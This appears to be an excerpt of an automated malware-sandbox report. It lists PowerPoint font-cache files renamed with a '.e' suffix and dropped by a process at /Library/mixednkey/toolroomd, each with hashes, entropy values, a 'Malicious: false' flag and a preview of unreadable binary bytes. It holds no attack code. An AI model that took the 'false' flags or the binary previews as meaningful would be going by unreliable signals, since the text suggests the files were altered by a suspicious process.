SSDEEP:	48:EKZ7Klp9j6jR+p9sJOkKHXJULzAnaeymdA46E9yTNpq:ab56c92Oj+LzWaciFE9ku
MD5:	063F65CB8220607965DA9E4AC840ABBB
SHA1:	639BE34E7CEF6E2F1537378EF1E3968DB9068DAC
SHA-256:	ED9F7A525BA0915142FB94F6F91A4238D7E395FF61BDBC150274CCDB7C2316FD
SHA-512:	E468E9164BE1392A6D48445DE15533FA9BECDDB791A860F3C0139B0CD2B1494CFC7E7D95FAA9015D4228CDEFBF02312088B2CEBC7CB50E55C18842410FB618B9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.....I....Ms.H.z..\.(.%.)Z.".,..0........-V.....,... ?./...6A......U".8.G}.....p...F.Xx..4.1..=..0e....F..>.[.."YPDm.N.........!PP..}.rK..6...d.0.E....Z.~6!..W..`T..s...o.......,r#JN+0.m..0..y.....}....~....-.iH.j9_...L...I\..T..=.(6..q.........V..b....a...7..H.....SG....:9A.....K.1.....6-FX.8.&'o.0.v...\..h.@-.-J3.'......w.$Nt.)..N ...w.u..b..QQ..0...G.A[.;.G....?..R..U.~.\tW....Z..<.J[.3.i.K*..K$..y1.X.\{.m..<.~.t...KN..E..V.J .....X[........qf..].4....T=.Q.Z...H....E'...H"...!>.jwXj.@.....gAIx...%.<.x.-.b...\Jig.`>..:+.g...bL..M.[..w<"....\|..?....h...0s.......K.Q..v.\.....sb...v....0r.....S..}7.#.B..:...p...g...;@....b.]L...h.=G..g4P'].}...1..H.....N@...dp.R..".......o.F..fH..O.....+?..zU.r.._k.a.....Q..L..0Y..L....u.....D..ba.Bu...n.........NtR.<tE......>...I.u.....TX......@^..3..w..<w....~..p......R.(.....i.v...K6R...ojpb.Ro.........?.'..{.$...u...Q.E6CN..`........y`.G...G

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CharterRoman.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1130
Entropy (8bit):	7.280410061868784
Encrypted:	false
SSDEEP:	24:EaLH9sW9OImGaPLdLLcMLr2Yrr5NyaQenuMGqwGmtllGsePc0m7:Ea7OW9OnBFlrxH2aVnuxqjmXlGNpq
MD5:	A83B443B231D869A651AE8AE83D8BE70
SHA1:	848DA285FF034767C96F760F0B2DD539BEFDAEFE
SHA-256:	EBBFC169106E2777475E7B2BD38D952509458E2739D74B66E34080CDAE8EA103
SHA-512:	9506F3A2E3D91A030B6F461F359CE3A2090712F59F1514D88EA694FAA90C2E98AE50A4F4967D2868102D88B4C8FD4E09C9899B95C902EFE1D26A21137108E8F6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.5...)b...>..Q,...\...R...X.j.Xz..q..?X.&4.........{..W..N...joq.R..{.6L....L..>.U..@....j....%g4y6.....F.H%0A.G.6 ....RpT..y....."..)'.l.....]X}^.i...-......J9su..s.[R=I...Ev..^j...)Wh....f..&.7Y2..\..EH..;.lAI...hT.T.........0T.?.bOo[.....iS#.J...O.M.E.).)...0....L.R.E...j.t>....Nf..I.6.......\|.4.n.O....>i.....O.m.n8.E.,{X.aY....:.....$..-s.<..b2......01.i...I.lmF..:....%.f....\|.....1....`..../.m....A..6..BT.juiJ...8...e^>..T.....ly.F..=8...1._;.... ...0.~?..p.............>......KO..0~.u=..]t:..E....$......D~t..K......&9.i........\|.;^.2..=%..z...~_.....v..~..q.J...<..}.I.q~/P.Y..k....l{.........`..:K.e..a...C...........q...q....i..6A8.t...e.......<.<...j.>.....'.G..x]V....#........9[!.E...izBPWy....O..T.N.h.c.0.$j=%..E..+..,..9.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CochinRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1170
Entropy (8bit):	7.301695921658724
Encrypted:	false
SSDEEP:	12:WvyOK6FENLQGQ9afhkm0nQfYrnzZrd1as90X4/ao8FnTiasewLYTc+qGm7:EKqELgsiR6YVd1au0ICo81RsePc0m7
MD5:	23D21748A9254E345257D8C5BF55E267
SHA1:	160B82CA5B1FB3ACD5164B3CA53EB45C7EC577A2
SHA-256:	69CDF33188A4D683CD10D0B8E86A8F01F06A697BAE5BD190DD0EA44F618D6956
SHA-512:	53A96E2582FA18C9E75178D8BC7B21386DFE091C6D1B657015E4F10BA66C0D8A2A6434E8E06BDD7ACE7429DCA4ED6D3A9F1AB45D4CB4A130E5A80B1F72ACAF30
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a4....4Q.1h....a.?v..l.......,/...I....#.3..1...'...&i7....:.[c..s.......I....>.Bi...q..e...z..............Z..=.k!..........I..;<...=..).;.$f.s...:N...,9.[.~..Bu.o...J}}..e.gSD....a.......ik....Gx....p.c3D....+...;..`..AYx......07.C`Z.....}...Z....-M.......PP....Z...s.6\(`.....n..n..Cp.{q.\|r}_o....O..sk...9...i.i..............d.}..T.6..S7?....O......M..{t2.D......../......(F.u..........C..n9...U.......Y-+i.._.S.N.-a..P...;A..mj..@....+.'.........2\|.<....2.H........2...e.)..O.4.f0...9X.D.V....Kw..q.o.D..6.B..@.,....~....'...D.........y.$....3.&Y)L3.k..H..,.^..d..I....#0.I......x.43....`....I"...x7lJ.U.u........k......z.rT..p..~.@{n`........P..]".YdI.'........<...>....l.6..(.)y.......C...-...+...a...bj.f...l...4\.......k.....'.G...)..49B..Z7.E\.:NtR.<tE..a.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Colonna MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1698
Entropy (8bit):	7.5727457131485725
Encrypted:	false
SSDEEP:	48:EjxV5cGisK7nwxQdgTDN4K1X+It+9eNpq:U5cNaxQuvN4KMIZu
MD5:	5CB5E4CF7B599B3EA63A5A34B614FBC2
SHA1:	4088AA934AC31C6FF18C265D6058CF8715F468A8
SHA-256:	80ACC1E5980384A6769A2BB8E3341B4493D9EF71B8BA21AC56DBBC26AE819C49
SHA-512:	1ABDECC16FA8086D894AE9F8A18D9D3B70359E94FEB4726A02CFBD56141068E1B43D319029DEF8DCFE4220897504555C730DB47FE2EF030EAF3FE0E0BB7BE6B1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...%)1....H.V...m..1.....T..l./.po..LlU.q?<.".^.9...w.'\.T.::.e.^..g6..o.....ogX..........-.h\|....T..Oy........3..m....'".b...g~.}T[.~RU.8EO.ef...@s.#UH.S.8..5..............-.0........ .=.....4.....V.a...O.m...........b...+...A\|.HNf.-.%....f..b:.\|.....H%K..K..\|G.....K.cOM..N.....nYio...f..u.(..+.q..D.PH.NtG......p2.(6Z)..y....,..>Bl.._.O'~..d\f..>..w..hp;.a.#....N7..n0.oE...\.=`(.#W..A..lB..Zt...........Tw8..[......y....^....V.B..SGr....[...2.t.;.....c.x....$...kB.bE2...m ..<YL...d4O:.....w....>...5./cZf.kJ.._6..3.T.:....9x.."z.Yc%...2iR..@..L....,l..D@.......A1Hn.@.....\.O.j=.R....+AI.C...T^....kCF..@.G...f.`.m..j....`%..;...@F.P....&..x.UN]Y.}...F/:...V4,.U...Lz...u...vz..JL.L{z$.S".#.Q]...e.q....[.[1B(.+...m._=...e._<.p....J..D......+P.u.\.%.X...w.N.5$....~..Am.`.5%=..R......KK.:.Q.C.z9..U..ml.n...W..k..f.....N_U..k..i..TMi.......RM`1...w7'..4......e..^..[,..8.eU-.%..........._....H.E.)...(

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Comic Sans MSBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	7.612422257631321
Encrypted:	false
SSDEEP:	48:Ejerf38CoKwa5IRMuiprinvJsdh+MDYDQNpq:aerf38CoKwa5IRMTpgvJG0ku
MD5:	B40E3BBE14CAEFFDBA0493D9BECFB6DB
SHA1:	F5470531350F4EEC2D5552080B9D87B4AD52CCE4
SHA-256:	30C5F0A2ED47513CC234BF755023F88072113957973018D47200C9D160FB3A1D
SHA-512:	0285F5C5F0530704DA18C2A37EB599391A674341BA6CC865025BF36FA46A7FAFAA4FA733E15BB0EBB2CDE8F3D4B47239292D7FFF595A19F41245D6130225E2F1
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.{.....8.U.nc.o..jK..E..l.....X...d.H.p5...l"..,.!..Jt...D..KzO.d&.....WIr.[..~.Q..\:A.=.'......i..+..j...j.g.P^.S,...P^.S,...P^.S,....{.w.\|R...2J.)t..g~..E.@..&.`.....u.<.../oJ.....D..z...A.YO...zP.I..E.J.c..%W;.o.<...l..w...j...n.".Y..,#.PA.w...Z.U..g...\..M....JZ6...N.V.....)...@F.<....E......?..../..@..=..Q...,..L.H.A{S=...)..8.t.T&.......(+P../.nC...ls?.._3.hG.@p.....^'..m..yP.;.....w.(8.p...I.i.f.Y.........L.....#..EhK/.b....2Mx.8.{...vG..\Vs....}...#...k~.t#..~.......}..7.5....L..b.8.c....>.4...R{..R..1..M....:fFp.....1..=.z..............Gt&m~.j.N.I^.WP.0.A.hLj.n.K.N6a.x.0.......w+^....hX.c.....t.+Y......2.......F..>....4.......v..........)a....../.k/....?}....N...g..=F'z.F.47..d\|V.*....?Y........[Q.....\..... ..;-.C.....w......_.l.W..b...>...c...v.g.^ ?......r...>../...).....&..t...-^.......Z...nr..."X.'.o...................8.....(.4...T..!3#n..n...-R......dp.....xE..W....J

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Comic Sans MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.624038843051359
Encrypted:	false
SSDEEP:	48:EPuGR+rlZraOdC9C07WIzkNZx2cks47qmElNpq:8R4ZuKkqJwhmu
MD5:	346E12A606B9B489EFD98A27EB75A09F
SHA1:	6CC7D8FE5BB575A73F6F7081A9F4D2027241056D
SHA-256:	E012CF4864ED2ABBCA96B42B63CA9F09E549F950037F202667125285A44F6ACF
SHA-512:	AFACCEC5FFEAEFB190991A2EC349F94892CBA219DECBAC3CF3B43CAE7AC9940AF81332ED3AFE506B98D4BF25D148940220263E71B7215066B84612EBE65DDA59
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a[p....N:..\|:...+..........)...Y...(..'...O.b....Wx^.......&.[........+.....U,.p..!.^..... .....{...\|..QU-.;\|.l+.DCJ...~...k.Xo...=\...)....e.PE.OX.Y..<.jA* .r...<v.1.`....W. .)N......../\|.....D.. G..~..D.b..F;V..0.N...6.q....^..\....B.5&...4.I.4.]..z.. ...gBn..)p...cp..j!..Vd...R..Z..e......I.../..kS..p.JX....Kx..D2....uI:.&R.B>.....]i.H..-......=3F....{.p2.g.S.%xm1..@a.".$..A........+g@.y....PV^.8.,#1/.p...cO8..J._c..P5..GG!.9V.@f.O..k.=.i....Q?.\....hG........h.....M..7A...........W....,..u.[.D4..Q.?..B.1..=.].&.D.#..9.I.i0...9vs6m..W...O...XU.M../..\..Zb..4.nTa1"$Q....yo.....ztt...z.M..4..].(....q~...j..%.c...j$...............u.{]...^.8d..k\|[H....B.Q.;..E..{.X..B4H..r.7..P.h..J.A..}IS.....].t.C............,"~Y...X/0...m-.....GAbi.w..i..g...I.=....h.Ir....\|e...X..d{=.H\|An..p1..4%<....x.o<.t{....Q..()...>..r.6B..Mbk.I.p..F=O..5...._....*....,qB.^....#.G........Z........e...s.wX...9P..;.."..=

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ConsolasRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1330
Entropy (8bit):	7.433667616979124
Encrypted:	false
SSDEEP:	24:E6OZLKXLfagqSS2SkZWd3eR70EWOcBJcCNJA7m4Fo/QsePc0m7:E6mLCq+WFelWOcEcAq4qQNpq
MD5:	FD035FC5A5ED8CE7A1EF78A9F69C702C
SHA1:	432A7624CA27DD7E4FB072C4CFB6A65F87EE0D41
SHA-256:	5FEDAA16A9B6D7A47B84A5942F649541F2A946757ADE33AB4F35FE2D3AAF4FFF
SHA-512:	45FA63D0098F8CFD0EBFC1C6C4C20F9504C1D6F13B2C2A6A48977B2EF43A7E472508BEE34F313A3A8F1439B21E46F8DEC14047214702E28C474F1C96B88CADD2
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.$.]hh.W4.....~3h.O..^..PmBFo.7......}Hcl@.>.{..D.z....[..T.<".t5...f........H..4....g.P-.'....6..S...l..gP.!B.7.[.......-.Tu.........a.. A..\|..3.o..~....O.q}.M.]...A...X...y..xY.....)..J:8.U0.5x.F.O..?......)..9..3.&.=`.[.. ...tb..Q..Y....?.....#j...7..[..v.../.CW~...s)%..L"..i.T..{s....p)#.....LQayP1..oU..}.&...F.2.ui.l.......H.....t%& $..3..o;.b=.........%..a.....'5h..>L..mT.........!.L..G..\|...AmbZ.......'.@`k....S.\M?..9.E.,.i....k...,....Q+SV.R....S@2.wS...`h.../[.X.........=b...(.iw.q..).9;:...j.o.K'...R...b.... `D...gS.{..ry...m>.a.u.....0+.y..."....,...C....Z...k.._.....H.)\|.5...........V.d..\|..*....t....../)......M'.R9... Z...N..E.=i.%g&.b.3.t~.......%...).v.....e[.b.\|HUq..d}....n.bu...!.....J...W2..]G.Q'..}TIW..f`..$..V....g.Xi`.bki:...m#.......l._..~...w.l.{.....C.T......(.%..,..6.A..aJ.D.k.0.>...C.I...>7.'&...ke.6..,....f.V=.N.(.6+g>K5`...=.....`.F .A.g.U8....AA..=

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ConstantiaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.429223515154918
Encrypted:	false
SSDEEP:	24:EYC2pkbPxfB3FM2ypapgXrMsAXM9dMLvaqJ7sePc0m7:EYPq1wJapMjF9WLvaW7Npq
MD5:	87187EA9A68B540C0612753558FCCB27
SHA1:	0FA335B52747A67305CBBA08A1E0150A99C2DE9F
SHA-256:	F429A94230D5010171CA81958655D17389AC2C50EE2041B05C29684075D61CE2
SHA-512:	18CB81262F03FECDBC66D97DB27FB181EBA3A99E3A446B38D6BB0E4E9583153F6BDCFCA9AA788A7F26590C0A5C196FC08C256E0C2B14C97324615B3D9B40775D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....mOJ[.W51..b..T.9.2s..W/r.$.....&Ko).:..'../......;.\|..^x.;A...z.ps...&h....\......O...........p..o..<...Uv........6t.\|.m~.gR..%.@...../..E.i70....P.-#[....Bv..7.Pb.E%..s..dX........f....M...-..$...%D....(p..7.,.gu]tL.....;..voY[......=.=.{pd.k.X.8H..(.......$.T1{.N.5c.!...W........l...KS.R...Q.p....I...T.....3Sj..W..Z,..(....8.i.D.k..8t.Q...l"...e....)..1A....N!..<.cI\|..@.(....%......Cf.R.$<^..[T(...2;.....E.N.9..S..=.......Hv@..ZxihE....V.T.\| .........kc2.x.dD.G$V..Rn3...p.q.j.x2,...?^..8...]\|....$0W\|=..K#..f.u.B.K[i1.G.?X,5zl7.qvh.?.]sN.r..,^Q"...E...-#...m..H....4.h]....B(..Y./=.d...C.$..k?...!;.fa..1...9.\Nj}...\|...........O..<.=..s<f..K........e.....s_~..../;.n.......z.......u....&.r...+..=....v.s.j..U<.......x.p{k.\|..I.R."].E.,.[.5.zU.. G'......~K..cf....'....Lm$...._.R....X.....C^.@.[.....n{."r.....1...I......J_).Tth.S...<..{....8.f..%.d)@W......M/....>-.....=Q...D.Q.%6D..e.L.Lx...v..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CooperBlack.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.342479069267897
Encrypted:	false
SSDEEP:	24:EnI4jE1aDxDnrhF7GMV6oKDZyRxRkpP9wg01sePc0m7:EVQ1InFEpKRkplwLNpq
MD5:	1E24A3EFC44174B4CB2DA9CC40DDAA4B
SHA1:	9F72882FE53E198FBB6A5F855B76D71B8A371E51
SHA-256:	4CB6F656C5E02775A9D1C8F76CFD1A9EA4D0F591A30EC51E9B7093F4F3BC39C9
SHA-512:	8E721CD4FE0DF065012B416EF65700EDB6A06C6D411068EDEE5D2FFCAA1CC29AF876E2FE6C00820951974A80E65C0DDC67E9A69648787B817C7A8BBC658BFE66
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a?../....:..c%Er..m.2.qQ..<.....i.!..........z...............lW.F`...RT.R.j...........m.P..........X..&..id...3.w.H%0A.G....y4.m.....'.A.m.B!...(A..d&..t..;..(.).....JjJ..O.\|4.s.2%....4..Ss._:.+...)..G..6.. 1...Yh:.(e....?..cg...U...rOHs.N.,....1..(.D.V9.....I...kd.C....3...2.... .Ht].{.}aw.<2...(>.......^2...Hs...17..P..G..d3...(..YL5.....sIm.......kO....9X+ts..M...c.....Nl..n......HR..c{+.K.2........T..[...v...N........u.U8....d..i.t.......&..RpU....%F.8ZS.y+........em...)..b/.....&\|.`.v.G ..7j........+S.=.(v..~g....q,yN.........m .=.E.]Vp.Ta...8........C.7......d.....2........z.%i3.b.c......a.k...z!.zR..h....&\..{.Nz.<2.....G..3.F.Co..x.r.=.I4....du...C%).q......m/...j. .T.P...O{..y......q.{..W.n....._B.3b..j.g.../U.S.}dV....0.v...w.....lK...d.h7+..p......_.T:...8..$/...#Tq../..`y;.T..&.8.].4....U..u......_....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Copperplate GothicBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2274
Entropy (8bit):	7.720276122933128
Encrypted:	false
SSDEEP:	48:E+M5jBSp3mNoatmS3k5dgh03IL8T2eaxHAq+iKr4pRaB8gSNpq:bM5Q3mNo2mOodI03lFaxHAqdKobu
MD5:	C219ABC63F3737DC022842C7B66E0A38
SHA1:	1CC650BFA8CD88268EC912C647FB3A759D181F18
SHA-256:	450DE7347D1CF84E469716B0BF1381F6CD5F072DDB1BCC7A21365E177020A9B4
SHA-512:	722CBE0552CFE1001E69BD3BC5E323D679F2956D5EF8582A00009CA55CF7F8F6B3725764F6D6DC979A1DB677845E1BCB715127BDAE2939A8380A24A29CCF06A4
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..\|.}.q+\]k..p4......C..VNg.(.v.5...........m2\|..Z4O"..m.7.Q...M...2..wS...g.....2.\..85+i.#..1%K..Y4.V6.'........6c..;.Wvw.....E.8..).(...:.{...v<...g.N.......p..)nj.6K.k.C.$.l.Bbk\|..k....5.}.0.......C..D.~\..I...1#.... .B..g..D....c1..Nw.#....)y....tq+. ...G..WXt.......T....4.K..c.........R.S.0....v.G.Z...Y.n.....`..f...z..._B0...oN....Ax.m.R.K....k.....i..o........nRg@....../)..%9.....E..$-@.)......\.m..`.....$6..w..2.?z..%...... ..l....Bl..2..0...(W...?..9.Ta.w-.bO..C..0.].......N.pa._~.z..[.@.f.6.;,.rN.....t...-.T.@...d...Yt.WE.[-.d.[K...}5..Y...U.x`.c}]\|!e;.o8}.[[.f..F~.O......}..F.J..v>.@.I....N#..i1daF..~..[Z..~......Nfq..a..R.T..7......gbs...U.../.&..7....... ='w....f....:...?..... fYu.#b."m.LR.B\|A..E;.eBQ.eS.....d..s..(.1..s..5Hw$.~7{.lG..... ,..RwI.....3 .<...vS.{......DE..K.b'..P.].>....i..+...t...>.#.r)w%3.TN.K..<r.F ..}G..$...HL4.#.x.J..rj....Ih...z.[.8..........n.p[4...=.W.OI!./.:

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CopperplateRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1722
Entropy (8bit):	7.570601960972882
Encrypted:	false
SSDEEP:	24:EkxbP2YFmeFKimTpSIKijau3u9eFSSdP8kuEbZQEB2haj/6sZ/JpcZ3osePc0m7:EmZFUijG7FFdluGZ/whoNpq
MD5:	0AF5F470501D052B3FF96EAFD9EF3CEC
SHA1:	C737FAEF14146D180393862A3F94E1EB4D9C1D2C
SHA-256:	A9AE35A39F3833B4EDE524F026BF132EE95B2F55D73E8A08C246B229D8204204
SHA-512:	7A2D5278D00904E1E08E4583AE32F0999AD3B714F0756CDE5316352F43FCD1666F19E091BF7DF279DEA7F3DECEC38BD2944EC75C092E5FF3A8A8185DAE06447D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a ...f\|S.\|...9..Y.?..r.!O.p.....e....Y.!.iS..ER...N~...^'.~..h._X[.Rc.nc...,.X`....jb.....han.4m~Ym...A.f.....s\..7...s\..7...s\..7...s\..7...j..?..5@<yD........,.......S...Sv.....dxzz..h@O.....u'..JIB.l.N.E.G.h.:a....?8k.....#..p ....7..j....T.,...KF>...+..`.....Ps.J.y&.Dt.x..1...\|z2.......@@...\|.#.E...T...X..........}j"....m.?..qNW..s..et1b.q......ny..~.{9_..s..Z9k.........Nr.......Yyja..;.i....v.......@.8...@...a.[..b..'.y.9..5C.@..txy.....4..q....Q. ]:..Z...X`.......oH...f.......]D{..#..D...zC.jZ[.P.......X.N....4..\|m...W{.......f......+LUSv.YV..a\]..Z.....5.\|.JV...E....%....#n......T..."W.....4LIdT._{T..6..N......H/w..G3.'..T.}..d_....="....R.Z.....\|Z........T..!x...$..Yh...+.P..uK#o.0....y.-vl..'..g....f...V>...Z..H..R.9.Ew5...-lz..'.....9.{_...x..t<....:.. ..9..vcX.#.R.7..'G....v2;.BS...~..)../#..8..........ZnH.^...Y..f.....gZ....m-8....4.C>.....i^U...T.....3......}.D....+.(...O.wvI.Rb;)

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CorbelRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	7.253250512279934
Encrypted:	false
SSDEEP:	24:Eck0yz39SEm+JQ4EWjvLhaineE/RPoA+uquXuGRXyKepZjSLsePc0m7:ESK39LttQspGJuVePjSLNpq
MD5:	131DFD7B95C698BB0190C3BD2E6F1F76
SHA1:	D9F1FB6E4F58971AEA56F532C02627F32D222600
SHA-256:	A16AE7C8921D6CBCC98ED975FE35D7317179A1FBBB8C4A2708D1D2C8CE2E9BBD
SHA-512:	E63BEAF43CA5EAA942ADB9E70ABC678A5C8B9FE0C6E4A98FB4833CDB3D11B5924C621419F52A428D96D421F26F3A99DAB4575FED0FB4FD35479126A091395B69
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..G"..i.H.p.....h.._7..z.....{...G1w...`..BO..L../)$.u...E...L.#.$......p.+..g..u.....5...v".NL.h.._+..0.%..............y.=4..K.^./...`:[Y.........f.Ex8..vx8.4.b...qI....Z...`..pGn.f.....J.Y...8.0..N.e.O]....1..}...%9.sN..E._.^.Js...#.7...Vo&..7:H"..I.....Y.`3<.b..vyW.m.W..n.ag.g..D....0...R.9...}q-.......L>....E.A...'V......b.\|[...)...5xJ..=.......$....x.c....^.O58.{W.(M..$.S......pS$\|.k>/.O...Cu...\|c...o(V........w..Z.]....G..$s.......%.A.n....3%oV........;.0.-1<....!....K..'.f.>...u...^.[.\|)......8.....Q....M... .....}....\|..[.._..t}^.(f&M7.......6.....wy..s.]}..`..l.A.].....2..E...JOU...._M...........z..Nr.O......4.:......->.W........@}fx.....?..M.....Y'za.(V.~h.%...\|a6-......c.}..~.e..lj.=.!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Cordia NewRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1514
Entropy (8bit):	7.482749516026008
Encrypted:	false
SSDEEP:	24:Emmb5OwkaP2CWtfpsvjZm4ilsEwnEQa6+W4y5wzECBFMmG9csePc0m7:Emmb5ia+vxsvjZLiyELQD1w4WMHaNpq
MD5:	706BEBFB7466CCC090F446AC8F5D5C97
SHA1:	8EED62B9DB7C800AB2F667524957C3186918B1C6
SHA-256:	EEC2339F42F04A0AC93652510588D6AB51D92F692A6830237706DB5537ABC5E7
SHA-512:	572B8C9408A8090DC280DD7ED420547AD7C9805256C93BEE7CAABB05045AC0755B837FC02C097218372674F5E963310AFA09CAEC6DEA4EC7E2FE7FDA78BF69B9
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.$.wf.6./A......Y.[...a....,. ].I.....J.0.$ ... .u.5..7..I.La..NP.r....3.^I.h.(......w.B......'a....QSD...h!..N......s<.a....m......G....vov.p..S@.q.......i...........@.S.Q3..I..!.As]...Sa...p.rA.O.....UI...........t...$..zR.a...n./..W...D..]a.z8..hu..+[.i..>2dS.z(..3/...n..M.....\|H..vEi....!1....].Y......W....k....E.H.%\|.....x.....~...fN;...yM!..T..X]....n2q...]./.w....8..)...........h....RTz;.sJ..\|..5.[.xI..5UC.j.+.._".%.....L(f..\|..\....2.8.j.....a....V...z....`.dkx..............<....N....0.eV)......T.........B.EC-.s.y...9..sB.W!~.....A-..w..0.;...[:6S...t........;..4T...Uu...5.}....q/.(..Y..sv...%.Hx...u.R..m.$$7I#},%....Y.....Kt.J..s)Q.iK...;..Ej.."I.}........".$.9i......<...X.....sSf....q...}..u..\\U>'.5`P.b..u.K.............YD..ps...&).V...$..m..-bf8..F..].1...JU.ks.'r^_..,..B..AS.=.....Ow..&ZH..k....9.wS...YVs.t..~.J.R.s..J....BecU...s6....~.9.hm...k..t$0_qY.....5."..&.B...

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CordiaUPCRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	7.486973356161537
Encrypted:	false
SSDEEP:	24:El4i02DRmlhvwPknoGAavXCHUALSQIaJsqGZog6C0oboU8Xuq/bYsePc0m7:E902ghZoGKUALdmZS28ZXu2YNpq
MD5:	C522491C2A4DEAFFECF7151FD96ECA4A
SHA1:	A9260E44ECF8A29044DC0CBF1AD5B054B05DE391
SHA-256:	AFC945DD462B27EC7D153A8AE65E90A5D5C263AB8FE74ADA0B8A414B2B87748F
SHA-512:	A27C717AE3D3023C3B3742CE7018BE226E46FCB6894035DEDF79BFEFF538A10D6E37FB6DC0B3652A079ACE94B34711819235975754F51F97D3D0D191477D9E8A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.1........7$mp.c-.h.#.1.....4.W.Z.!2Z...;[Sz...g3$!dK.\.T).,X].L..b.U2...x...h....Tt._..@4.W.Z....d.q.m..}$...m.U..S..1....O...%...7...L.?.,X..Jh..Y..?s/&...+4=..~...h...P..&Y...a..H0ND.#}.>.B9d.{....J.\|...y..?i/..\|...M....s.3.(8>w.+..`+.......]j...Q./j...:......xaHf..+.J.w.D.<.o`...?x.P.TY+....b(..7.xX...X.N.D<V{G.-T}}.\.@n..J..[..+.P....../IV..P....l(.&........._3#.iX.:.kL.c.`..'vF.l\|..~......;.JR..[...5.c...gH'..5v......Kt.^.1.....qi...w...?.YiP..{.H\Q...[d'0.[..gs.,)..T."....nXt[xv...3...a0.......-.(....M.W.s...u.A..p....I$>.y1...+...2.s%.5..v..v...\.Qy.kG.2.n....>%a......#s..XJ.rM-x.2...-s2..HA..P.'..I1)..?\|A.B..}....}..m...&....y....<.....El'.....9Xo.....qz.\|n.k&N...b.n_[.=Cn......JO..O.....W..;.........j...E......;...."._......XD"..WlEsy...q.;J.E`.T.....j-C.4.l.....PV,fy..?c.`Q...@.......2`.&.[...x~......(k.@T3...3[N..p0..,.........0.:.,q..4.6.^..I."............{.^T2.v...H.#(.......

